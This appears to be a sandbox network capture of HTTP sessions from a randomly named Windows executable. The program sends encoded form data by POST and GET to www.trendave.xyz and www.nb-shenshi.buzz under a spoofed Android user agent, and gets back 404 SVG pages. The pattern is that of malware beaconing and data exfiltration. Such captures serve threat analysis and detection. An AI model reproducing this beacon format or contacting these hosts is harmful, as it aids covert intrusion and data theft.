Nov 20, 2024 04:20:24.062935114 CET	1236	IN	Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	64850	203.161.42.73	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:26.008686066 CET	10832	OUT	POST /nhcb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.trendave.xyz Origin: http://www.trendave.xyz Referer: http://www.trendave.xyz/nhcb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 45 76 58 6b 43 69 62 37 69 33 61 66 78 50 6e 52 74 45 71 5a 62 4a 69 63 48 6f 33 30 75 4c 52 67 76 52 4c 4c 74 59 4f 5a 56 6b 4d 75 68 36 64 6e 6c 74 61 51 4f 67 55 41 34 46 47 33 4a 38 4b 74 44 34 45 53 58 49 47 49 4e 4b 6b 37 63 74 6e 4b 5a 71 49 32 4f 43 6e 35 6b 46 4f 75 75 74 56 78 6d 32 58 4e 7a 47 75 34 69 6f 61 4f 78 32 44 6e 57 38 50 53 59 34 4b 51 50 6d 41 38 52 72 61 7a 49 43 32 4a 45 41 4e 32 6a 41 6f 36 47 69 76 6e 32 61 30 39 68 6b 2f 48 46 68 6f 68 78 6f 4c 59 55 2b 78 45 63 79 68 4f 4d 67 6d 30 62 6a 66 33 51 51 62 46 61 2f 62 63 2f 75 76 74 52 6e 39 4c 34 6f 58 33 77 35 6e 4b 77 31 67 53 67 6d 39 4c 57 43 5a 73 58 55 65 79 4c 52 4c 2f 34 73 49 2b 66 77 6f 51 37 35 73 78 5a 55 79 79 30 4f 67 30 64 46 6e 30 55 77 52 50 30 4e 6a 6a 6b 7a 52 78 4c 2f 57 51 64 4b 71 63 30 6e 4c 36 31 34 49 42 50 52 6f 73 76 65 41 7a 6d 43 66 67 2b 49 73 6b 36 69 79 5a 76 57 5a 32 6c 52 61 77 6f 4a 4b 5a 6c 6a 39 32 31 4c 39 47 35 55 61 6d 4a 6b 6d 46 51 78 51 66 34 2b 61 31 6a 4d 36 32 66 34 [TRUNCATED] Data Ascii: xDq=EvXkCib7i3afxPnRtEqZbJicHo30uLRgvRLLtYOZVkMuh6dnltaQOgUA4FG3J8KtD4ESXIGINKk7ctnKZqI2OCn5kFOuutVxm2XNzGu4ioaOx2DnW8PSY4KQPmA8RrazIC2JEAN2jAo6Givn2a09hk/HFhohxoLYU+xEcyhOMgm0bjf3QQbFa/bc/uvtRn9L4oX3w5nKw1gSgm9LWCZsXUeyLRL/4sI+fwoQ75sxZUyy0Og0dFn0UwRP0NjjkzRxL/WQdKqc0nL614IBPRosveAzmCfg+Isk6iyZvWZ2lRawoJKZlj921L9G5UamJkmFQxQf4+a1jM62f4EuSpco/FyNZmOga0dUJ0dlYjbtErFrY/3cwlnsSoujDnZ1SnwGBfp5Mh/o6DHdaMMYvmVJnzuNRO43pKELbHCn7Nu4jpCDSdzWepjYXRzu6bPbtFWhzWxXsGdlt8dfQTTmbEq7OT60YobjfWUBq40gU5gb/DjmgE+Vjl25jvmSiNzAblEV5b7MabC0+SS8ASa8OL7tAkELvFoE8UJsC+0W50ExOB9QeE94fS1nO8XIl8hpZ/ndCZVqn2+oyc+cN3qWaD8BSOfSZJ87ZJD1Dvix9Iun+WytRCFEqSzzqNgsbfA4RW/90z2zjpQdeTb7VoKB8+VxDQslDEbylahSlo9KR2w5hOZq2h029Yc8tGpU0Lt+UE5pLIGUBnodbOTRM1MS7tHh+td3kJlzXsUgXlF2h3Ca6pNu6YsUJ8BOuicI0rrKXY4TPVWgebXN4bjrtOHSRnBpPp076NyKfbkHUqhayzagFCt1P6YIugX8UbDAUf4duiL64nnUtGg3XFT3KrHU3aeBFbG4wneuQUpDReCm6brLDS2+s+ZR5AU0xpDBO3B6vEg8MaKnqiMA4hxdYQevELLUxWzX2UmNM/tInDs2hgOpXovQT5ocYycp5w7cMD+OmKeP8n+ZeGEMTGrJobsGtfQVcPQRYe7Qm+s+ejMBc12u5XbleYSI [TRUNCATED]
Nov 20, 2024 04:20:26.665014029 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:20:26 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Nov 20, 2024 04:20:26.665061951 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Nov 20, 2024 04:20:26.665100098 CET	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Nov 20, 2024 04:20:26.665137053 CET	672	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Nov 20, 2024 04:20:26.665169954 CET	1236	IN	Data Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
Nov 20, 2024 04:20:26.665204048 CET	1236	IN	Data Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39 Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
Nov 20, 2024 04:20:26.665241003 CET	1236	IN	Data Raw: 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 37 22 0a 20 20 20 Data Ascii: inejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.82
Nov 20, 2024 04:20:26.665270090 CET	104	IN	Data Raw: 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38 Data Ascii: -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.
Nov 20, 2024 04:20:26.665303946 CET	1236	IN	Data Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
Nov 20, 2024 04:20:26.665340900 CET	1236	IN	Data Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.
Nov 20, 2024 04:20:26.670286894 CET	1236	IN	Data Raw: 74 68 34 36 31 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: th4616" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	64851	203.161.42.73	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:28.553133965 CET	468	OUT	GET /nhcb/?xDq=Jt/EBXmNn0Xont3Uq3SrNJmrJY3M4cpFu0H2rr3BW2spn453uaHrewE12DuyPcurf4Mzbuz0WqMTaNbmObgJIgyyiHGSgJZQh0vowHWBwbWi8nXeO4OBSJo=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.trendave.xyz User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:20:29.165998936 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:20:29 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Nov 20, 2024 04:20:29.166042089 CET	224	IN	Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-
Nov 20, 2024 04:20:29.166073084 CET	1236	IN	Data Raw: 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 Data Ascii: 2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -
Nov 20, 2024 04:20:29.166105032 CET	224	IN	Data Raw: 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 Data Ascii: -linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.178
Nov 20, 2024 04:20:29.166138887 CET	1236	IN	Data Raw: 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 Data Ascii: 01 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,
Nov 20, 2024 04:20:29.166177034 CET	1236	IN	Data Raw: 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 Data Ascii: 3,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91
Nov 20, 2024 04:20:29.166210890 CET	1236	IN	Data Raw: 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e Data Ascii: 7,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,2
Nov 20, 2024 04:20:29.166244984 CET	672	IN	Data Raw: 37 2c 39 2e 36 36 33 31 20 31 2e 39 34 34 34 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e Data Ascii: 7,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
Nov 20, 2024 04:20:29.166280031 CET	1236	IN	Data Raw: 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 Data Ascii: 2,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541"
Nov 20, 2024 04:20:29.166307926 CET	224	IN	Data Raw: 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 Data Ascii: "m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
Nov 20, 2024 04:20:29.171353102 CET	1236	IN	Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	64852	161.97.168.245	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:34.815354109 CET	739	OUT	POST /1mwk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.nb-shenshi.buzz Origin: http://www.nb-shenshi.buzz Referer: http://www.nb-shenshi.buzz/1mwk/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 58 4e 58 41 77 59 33 70 4d 33 6a 76 4a 56 63 4b 77 30 36 6d 6c 5a 52 4f 2b 69 59 39 4a 4f 35 4e 6a 67 34 70 48 48 6b 4c 68 4b 65 77 45 4d 46 57 56 76 2f 38 6f 45 41 71 70 72 73 35 73 73 48 77 52 4b 58 2b 6c 48 70 2f 43 30 65 65 44 6d 4d 58 2b 6e 6f 6c 67 4b 44 49 4f 64 6f 64 59 55 4e 6b 62 4d 4a 42 51 51 41 52 50 38 7a 49 52 73 41 6c 6f 7a 6e 51 63 68 71 30 77 54 78 67 63 5a 78 34 54 63 36 65 45 48 79 73 32 33 42 71 78 32 78 45 31 63 39 42 56 4a 51 32 2f 51 4d 49 70 57 7a 59 33 5a 2b 42 56 51 78 78 47 32 50 6a 4b 45 59 55 62 48 48 4d 6e 38 2b 54 6b 6a 31 79 43 2b 5a 64 42 67 3d 3d Data Ascii: xDq=XNXAwY3pM3jvJVcKw06mlZRO+iY9JO5Njg4pHHkLhKewEMFWVv/8oEAqprs5ssHwRKX+lHp/C0eeDmMX+nolgKDIOdodYUNkbMJBQQARP8zIRsAloznQchq0wTxgcZx4Tc6eEHys23Bqx2xE1c9BVJQ2/QMIpWzY3Z+BVQxxG2PjKEYUbHHMn8+Tkj1yC+ZdBg==
Nov 20, 2024 04:20:35.410223007 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI 